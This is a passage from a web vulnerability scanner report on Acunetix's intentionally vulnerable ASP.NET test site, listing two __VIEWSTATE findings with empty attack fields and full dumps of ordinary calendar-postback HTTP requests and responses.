style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1125 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,125 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8199&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgCAyKjPTNoIZGRkNup1dt3ao2G6jpwB7KnBwAsFmK8%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwL9i72NBAK646%2FsDgKcisLvAQK%2Fk6foDAK%2Fk6foDAK%2Fk9uMBAK%2Fk9uMBAK%2Fk8%2BjDQK%2Fk8%2BjDQK%2Fk%2BPGBgK%2Fk%2BPGBgK%2Fk9evAwK%2Fk9evAwK%2Fk8vCDAK%2Fk8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6%2FSUCkLqR%2BAkCkLqR%2BAkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ%2FJwKAtfZ%2FJwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC%2BKQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w840B%2BPqI3XIG21evJguBWu7cJALw%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:21:06 GMT Content-Length: 12444
Response Body - size: 12,444 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgCAyKjPTNoIZGRkNup1dt3ao2G6jpwB7KnBwAsFmK8=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwL9i72NBAK646/sDgKcisLvAQK/k6foDAK/k6foDAK/k9uMBAK/k9uMBAK/k8+jDQK/k8+jDQK/k+PGBgK/k+PGBgK/k9evAwK/k9evAwK/k8vCDAK/k8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6/SUCkLqR+AkCkLqR+AkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ/JwKAtfZ/JwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC+KQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w840B+PqI3XIG21evJguBWu7cJALw==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8191')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8192')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8193')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8194')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8195')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8196')" style="color:Black" title="June 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8197')" style="color:Black" title="June 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8198')" style="color:Black" title="June 12">12</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8199')" style="color:White" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8200')" style="color:Black" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8201')" style="color:Black" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8202')" style="color:Black" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8203')" style="color:Black" title="June 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8204')" style="color:Black" title="June 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8205')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8206')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8207')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8208')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8209')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8210')" style="color:Black" title="June 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8211')" style="color:Black" title="June 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1129 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,129 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8186&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgDAaYGYQtoIZGRk%2FyT2CRqgE%2BFRE6BpjyuoL72OL5A%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKw1ZueBgK646%2FsDgKcisLvAQK%2Fk6foDAK%2Fk6foDAK%2Fk9uMBAK%2Fk9uMBAK%2Fk8%2BjDQK%2Fk8%2BjDQK%2Fk%2BPGBgK%2Fk%2BPGBgK%2Fk9evAwK%2Fk9evAwK%2Fk8vCDAK%2Fk8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6%2FSUCkLqR%2BAkCkLqR%2BAkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ%2FJwKAtfZ%2FJwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC%2BKQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w%2FascmpdpAjioUsoCzVg6FOfJXFVg%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:47:20 GMT Content-Length: 12444
Response Body - size: 12,444 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgDAaYGYQtoIZGRk/yT2CRqgE+FRE6BpjyuoL72OL5A=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKw1ZueBgK646/sDgKcisLvAQK/k6foDAK/k6foDAK/k9uMBAK/k9uMBAK/k8+jDQK/k8+jDQK/k+PGBgK/k+PGBgK/k9evAwK/k9evAwK/k8vCDAK/k8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6/SUCkLqR+AkCkLqR+AkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ/JwKAtfZ/JwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC+KQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w/ascmpdpAjioUsoCzVg6FOfJXFVg==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:White" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8191')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8192')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8193')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8194')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8195')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8196')" style="color:Black" title="June 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8197')" style="color:Black" title="June 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8198')" style="color:Black" title="June 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8199')" style="color:Black" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8200')" style="color:Black" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8201')" style="color:Black" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8202')" style="color:Black" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8203')" style="color:Black" title="June 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8204')" style="color:Black" title="June 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8205')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8206')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8207')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8208')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8209')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8210')" style="color:Black" title="June 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8211')" style="color:Black" title="June 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div 